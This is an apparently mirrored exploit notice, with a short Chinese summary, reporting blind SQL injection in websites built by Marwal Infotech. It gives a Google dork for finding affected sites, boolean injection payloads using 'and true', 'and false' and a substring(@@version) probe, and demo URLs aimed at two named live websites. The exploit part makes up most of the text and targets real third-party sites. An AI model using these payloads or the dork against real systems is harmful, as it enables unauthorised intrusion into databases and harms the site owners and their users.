Marwal Infotech - Blind Sql Injection Vulnerability
Marwal Infotech 存在盲 SQL 注入漏洞,攻击者可通过在 URL 参数末尾添加特定条件(如 `and true` 或 `and false`)利用该漏洞。示例链接显示攻击者可进一步使用 SQL 函数(如 `substring(@@version,1,1)=1`)进行验证。该漏洞由 Behrouz Mansoori 发现并报告。 2025-5-8 19:15:33 Author: cxsecurity.com(查看原文) 阅读量:7 收藏

********************************************************* #Exploit Title: Marwal Infotech - Blind Sql Injection Vulnerability #Date: 2025-05-07 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by : Marwal Infotech" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://www.tagorettcollege.com/page.php?id=23%20and%20true-- * https://www.tagorettcollege.com/page.php?id=23%20and%20false-- * https://www.tagorettcollege.com/page.php?id=23%20and%20substring(@@version,1,1)=1-- ### Demo 2: * https://www.gpsgotan.co.in/page.php?id=61%20and%20true-- * https://www.gpsgotan.co.in/page.php?id=61%20and%20false-- * https://www.gpsgotan.co.in/page.php?id=61%20and%20substring(@@version,1,1)=1-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025050018
如有侵权请联系:admin#unsafe.sh